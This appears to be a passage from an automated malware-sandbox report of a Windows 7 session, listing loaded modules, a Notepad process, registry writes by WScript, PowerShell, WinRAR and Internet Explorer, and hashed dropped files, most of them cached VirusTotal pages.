c:\program files\internet explorer\iexplore.exe
c:\program files\winrar\winrar.exe
c:\windows\syswow64\wshext.dll
c:\windows\syswow64\wscript.exe

PID
2996
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\New Text Document.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\duser.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\xmllite.dll

Registry activity

Total events
2823
Read events
2575
Write events
248
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2064
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
3312177648
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30768812
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
3612740538
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768812
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007D000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{02E153D4-EAA0-11E9-9008-5254004AAD21}
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
9B7D15C6AC7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
321616C6AC7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E0015000100FA00
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DHP
ChangeNotice
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000DF7B819B12B3F64EA1522C0F978D8A5000000000020000000000106600000001000020000000C76DAAD76AD8BFD4942DB86D60E1624B367E02A43BB48E57131E4430082BB9BA000000000E8000000002000020000000C54CC9CBC768F80F4B4E7FB5350E59EBFE12DFDE0D835F5673B7F36320C4453A10000000423FFA0115227195A4D186642E9404CE4000000001F622A629CB3AA7C9C237C559C3205EAA1692881B859AA192C7AF7126CB8351BD35DBBD8909F86D05FFD42F363AC159D3B0AA556E206A839CDEC71BA47CF5F6
2172
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E0015000F002302
2172
iexplore.exe
write

Files activity

Executable files
0
Suspicious files
40
Text files
151
Unknown types
1

Dropped files

PID
Process
Filename
Type
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\search[1].json
text
MD5: 449f61c84cd2f7342f95403c908c0603
SHA256: 19170bd75edc0b5183a2f9fcc3001d9d222deff61e5915ad1127b65ab581a2a1
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\aea7e831[1].js
text
MD5: eee26aac05916e789b25e56157b2c712
SHA256: 249bcdcaa655bdee9d61edff9d93544fa343e0c2b4dca4ec4264af2cb00216c2
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\it-IT.1
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\suggestions[1].it-IT
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\VI1ZP4ZM.txt
text
MD5: faa5880193ec5ded2f2136832a3f4de5
SHA256: c15903c4b5a900b9a7c3d8fd39f0364eee347667d0c9ec7997c2b6a0ff08acc9
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\VH4QKYH9.txt
––
MD5:  ––
SHA256:  ––
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\HWEGGTCC.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_6[1].htm
html
MD5: 302e14969095715d2244c91d10c5c2db
SHA256: bffb3e3d7e90dcd4df72e57fde045c77c5a276edb0ebbfed4641614ef1e66795
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_14[1].htm
html
MD5: 08bce929a75403494181a962e9d63c5f
SHA256: 4900fe4a1579ee64d74478cacd3ea78e0641e02bdf40bb8af2d515c684714f71
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_4[1].htm
html
MD5: a3b7387d2dc98c07f33dae359d4c1e9f
SHA256: 40bd16b47ccb549172f78eb71afcad2baf838a9b8faf6d60582871cdc3449e87
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_5[1].htm
html
MD5: e2b4cf2112827cca7ed78b94a0dd8c02
SHA256: 24fd8de9cdf0d7dd837767f7979cd036dc4cefdc4ac10670827643b9d6f17dce
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\shared_bundle_13[1].htm
html
MD5: 07d205e1888aa7e5eb0caac98d91bfc7
SHA256: 48e6611991f35e21f963d9b4ef1cff511af208d5ac512570bcf195624b8dd63c
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\vt-ui-submissions-info[1].htm
html
MD5: ed647ac3d51452ded47d1b689adbf864
SHA256: fa56b6dac9d41be9f8be31d8e1b1bede681ab5081ee1bbaa55f09dbd04acb831
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\shared_bundle_18[1].htm
html
MD5: f10b1563e52cca8bd0220085155cf76a
SHA256: 04de76c3ab328f380e32bc3a8701d297c59d9632ec4adc802770a2cf60ed8625
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\vt-ui-file-details[1].htm
html
MD5: 4292a0ae6041593764794686d6040e0d
SHA256: dde8e1d389c9e7f46e0cddc2507d7727cff1ea3596370da9e258d7dcd4a5c286
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\vt-ui-behaviour[1].htm
html
MD5: 5009c1f9bbe1f1ee6fb33490720d2693
SHA256: c8aaa5a1d30d65e60c93b7620e3026f5261d7d71d0ca3925d64e66f729392159
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\vt-ui-file-relations[1].htm
html
MD5: a95d7d877bfa4e2d9bd56b92114d07cd
SHA256: 924aa0fbba80a386e91c3df0aef6bc22413da25dd07591fd1756739b8eceed6b
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\vt-ui-behaviour-extra-info[1].htm
html
MD5: d81108691f77fd54237e11a12bf62c34
SHA256: adae875ada5b901f33d0bfbf2e08e0adf4316d729c0bd554a8656e1b07c94c7d
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\graphs[1].json
text
MD5: 5068fc922aaecde43a6b6830aad26bd3
SHA256: 8fe04f0007032c2f637c72698c6cc9746fe33a50be95e74eec5657f92f2c3c28
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\contacted_ips[1].json
text
MD5: fec0bcad967352032ac64edbea97c2b1
SHA256: 805df78beea0ada85f6e1553a813829a0605560f5c410065ec06d911114e4480
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\file[1].htm
html
MD5: 28c9597bd5889642b31d44580fe135fe
SHA256: 0f36d539b68f4b96fd66e55e57b4105fabb2a0aeb2174d0134e638ad0457be0e
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\contacted_domains[1].json
text
MD5: b6f2f7697ca8ad8990d4dca80990d4af
SHA256: 824744faba987be1e875cc88c5c59f4e5a49593c121a192ea9f64654100410fd
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\contacted_urls[1].json
text
MD5: 2dbc5256c88e74e09a8baa1bd36ec819
SHA256: 17b82fa1f934f95ebf25590f16c93a552d34dec6a7abe3dfc2efef9a6b775c7e
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\execution_parents[1].json
text
MD5: ef1a9dfa6a6ffacb43094f818085d236
SHA256: c831d988166d916b8e6ede8194916cc817b71d614870c0147ed720f8ba7173ce
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\pe_resource_parents[1].json
text
MD5: ebeb2b90d248d368ca9b71bd476091fa
SHA256: 4af97fc6eb8923177ff810d3e00a2e7e78a0e447d06e5e92e37acf391bdc437c
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\votes[1].json
text
MD5: e925293a2e208688299ccf266af318ef
SHA256: 4a0df5bd75b93df343581cfbe310e13a8528b4f830a3e6d6fed847478395ed93
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\bundled_files[1].json
text
MD5: 6806a990b6f1a27dfb4f7f0a6a7a5dcd
SHA256: 87a387494abb0692f05351d3fd7ce61c53590ac38afe2001e0cb74accdcc4111
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\behaviours[1].json
text
MD5: c2ad77f947f50a8c9fd3c62baf068e90
SHA256: c02118816a8546e4682ea555650a487a4f574f8f73687411175fb3fb5706bd3f
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\comments[1].json
text
MD5: 39ac993df717214e00f433a86b274840
SHA256: f1987e456ea5dc7bf8c7868e8823c8ba8b705d3c69870cdfbd2fda509d2b694b
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\vt-ui-analyses-list[1].htm
html
MD5: 630d85f0dcca8b143efbd2cda5674020
SHA256: cb0b921825c8e4c4b84485656de2e00a16d085df9d2bee43af8d86ad35e3de1a
2484
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.virustotal[1].xml
text
MD5: a3eadb959e8227840c21beb56161c429
SHA256: 21044e4416eafc98c4dfdad2b82d9e264cea3ef540fa49b052efcfa4e179a73b
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\e103aed24b28ac11c7444c5a94dc3ddd8f313d3d33f43ffa85dab1264a7d9879[1].json
text
MD5: bd754807ccd109038e6e884cc7425c93
SHA256: 6168042e8a60e14d659c8d3494cdca70cac28fa707401a4dd543c6e88962ff0b
2484
IEXPLORE.EXE
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\HMU51R4Q\www.virustotal[1].xml
text
MD5: c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA256: b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\JOU2Y43P.txt
text
MD5: c5fa26e8088bcf20846c834d884decbd
SHA256: 30df26b87e5a32589ed661f7d59e6e7f8e26ef50cab0c84ee1088f688c6ba377
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\web-worker[1].js
text
MD5: 6347e99b1c4c83a914595479835dbb5a
SHA256: df4e519b82ced24d0dd2a56dfa72106aeb88541e0a02492138647751007a2097
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\sha256[1].js
text
MD5: bc98f9b4852f326d8a8022689f6eb6d4
SHA256: ac40f660b134e1e3ccfee652746aeafc5b11e0803a0d0c6f8a6bb3a68bf80991
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\vt-ui-main-generic-report-community-tab[1].htm
html
MD5: 3513d734312e0044a7c53b449b237bea
SHA256: 4b0ea5e6c8638f20d1bc5c06c2838f10de01366bac9470676685dbadf810bca7
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\YML5IWP6.txt
text
MD5: 9bdc7077e633acec93330141877b180b
SHA256: 6d8f8450012b9ec4174f6b0439a7673b91028fc38122a400644bd6729911e75a
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\1ARARQ58.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\KFDBK334.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\analytics[1].js
text
MD5: b66b3b5d54e154c81a50880cdcd7e5f8
SHA256: dbb67c620eaabf6679a314db18d3ae43037aef71ab27422e6feec08ee987cc0a
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_9[1].htm
html
MD5: 5966f99b9ae8171f3abeb1bbb2598732
SHA256: 4f03e51bb3a03da96c850c8d41eb6816a68dd8f167d4e0c0cc1d6d3e6be3ec81
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\shared_bundle_21[1].htm
html
MD5: 0d7b55e6f80ae11868a0d6e7f0bf035b
SHA256: d563c34ef8947cf119cdc2e837525c9c84a54a28e73201742168a9097b4f9e75
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\shared_bundle_10[1].htm
html
MD5: c6dde8442b462739ae16ab0daf0e7ca1
SHA256: 6936ead6b07f75a6584bd13f1f67ae29088f55af69a9f70d0a1f484e809e6d14
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\shared_bundle_12[1].htm
html
MD5: ae3298ce8d8f45945775d43c2b7b0dd5
SHA256: 91b34ecbc45d4b85d5886a835bff01945383db25c6fbd9d33f84d82a2a0e916d
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_8[1].htm
html
MD5: eda9aba9a538c8894f71116e29e3a161
SHA256: 9f5f32f7859db7b581e20e4fa9b1d1d2865cf47a5c1667bd4d63b4ff1609179e
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_27[1].htm
html
MD5: acd46147b3c5770473a4453aa4e664cf
SHA256: 09d7f02748ba4dad9e612d14f82817ca3a84256796e493d0d3811c2eb10bd0f7
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_15[1].htm
html
MD5: f9c2cbf9e7b8f5d92ef88abc800b30f0
SHA256: d7ed378818b06358857c85394acf57deea5a357f89ebf15164c5512e2d6ed058
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\vt-ui-detections-list[1].htm
html
MD5: ccc2135f103db95137adc06074820a45
SHA256: 7260e73bf9bda5b9b4cb27fb8064df3585309410361e06ef96bf4b32af46f9de
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\vt-graphs-line[1].htm
html
MD5: 0e762e18c6ca220264517fb0e04aa548
SHA256: 9cb64232bc5e41d6822a2993b2174f486438701fda4730dc9b305a411bd77cc6
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\shared_bundle_11[1].htm
text
MD5: 723c43dd968b1ebc9b7fca1069a0a2fb
SHA256: 3177d37985b8daf91e637106a382486a38881034e7e5e00335627bdadf25590c
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\shared_bundle_20[1].htm
html
MD5: 2ca20c8bd46ce61fe4245d6d824f95a0
SHA256: f2375632be751bff593ab71e32323e8b36acdfd78d0afe3a288063f23aee9185
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_25[1].htm
html
MD5: 3404e9431835b7cefb854472cea5eee2
SHA256: 135f501af4e41f0e245d957549d771382b4c34408b7862b97645e0283b27e6b9
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_2[1].htm
html
MD5: 72dd6d7df894306aee613498fa9fc5bc
SHA256: 08a3e627925953959a982e9beaa0fc1bfebc594d1972f1044bdebe01e97fa496
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\search-view[1].htm
html
MD5: 5fa460a7a7d4bb3ff182d36d6b116ed5
SHA256: 3a282c229e5f6642716c2aea919fb4e92265cfa89d589b8edec5d86611477714
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\file-view[1].htm
html
MD5: c0899184dea5917ad87e605961a256a2
SHA256: 6299f5642f2f1c0902819007e69f650ef6813f0136d3b4a18637a133320fffdd
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\app[1].htm
html
MD5: b5e8954679a500362654e0406f818fae
SHA256: d59ee0757004276af97ba6d1caff28cef0392f0c7435a65bc13cf3b096594e2a
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\vt_logo[1].svg
image
MD5: 7691bc9ab2341f30c139ae44b9891c0e
SHA256: 62d64ec088df68f04a68a58249ae63921ef57554e97470b8ea72b26eff2fd281
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\urlblockindex[1].bin
binary
MD5: fa518e3dfae8ca3a0e495460fd60c791
SHA256: 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
xml
MD5: 7c0e98813a48d3d9d55c1037a6d2fa68
SHA256: 5b8274093f4b5529f6f7b0977167fd202c1d6fc1a7a9d3931a1b04c3ee8b8cad
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\iecompatviewlist[1].xml
xml
